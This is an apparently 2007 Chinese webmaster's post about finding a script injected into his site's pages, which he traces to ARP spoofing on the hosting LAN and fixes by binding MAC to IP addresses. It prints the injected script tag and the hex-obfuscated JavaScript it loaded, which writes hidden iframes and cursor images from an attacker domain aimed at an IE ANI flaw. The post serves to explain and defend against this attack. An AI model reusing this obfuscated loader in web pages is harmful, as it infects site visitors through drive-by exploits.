快捷導(dǎo)航

網(wǎng)站被黑的假象--ARP欺騙之頁(yè)面中加入一段js

更新時(shí)間：2007年05月16日 00:00:00 作者：

昨天晚上發(fā)現(xiàn)訪問(wèn)我的網(wǎng)站的時(shí)候網(wǎng)頁(yè)代碼html的前面多了一串js代碼。剛開(kāi)始以為網(wǎng)站被黑了，趕緊到服務(wù)器上查看所有文件是否帶有這串js代碼，搜索結(jié)果沒(méi)有，而且服務(wù)器也沒(méi)發(fā)現(xiàn)被入侵的痕跡。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能從這段代碼入手，我下載這個(gè)js開(kāi)發(fā)發(fā)現(xiàn)是下面一段代碼：

復(fù)制代碼代碼如下:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索發(fā)現(xiàn)有人已經(jīng)發(fā)現(xiàn)同樣情況.http://0e2.net/post/676.html
看了這篇文章之后了解到不是服務(wù)器被黑了,而是服務(wù)器所在的機(jī)房?jī)?nèi)網(wǎng)有中木馬病毒的主機(jī)在搞arp欺騙.
這些木馬捕抓了我的服務(wù)器發(fā)送出來(lái)的報(bào)文之后,篡改了報(bào)文的內(nèi)容,在html頭加入了前面那段木馬病毒代碼.然后再轉(zhuǎn)發(fā)給訪問(wèn)我網(wǎng)站的用戶主機(jī).這段木馬是針對(duì)ie的ani漏洞的,微軟用戶的電腦要趕緊升級(jí)打補(bǔ)丁.
最后問(wèn)題就在于如何讓我的服務(wù)器防止被ARP欺騙.打電話到機(jī)房,技術(shù)人員讓我們將mac和ip地址綁定,問(wèn)題終于解決.
關(guān)于ARP欺騙相關(guān)知識(shí):
http://zhidao.baidu.com/question/7980952.html?si=1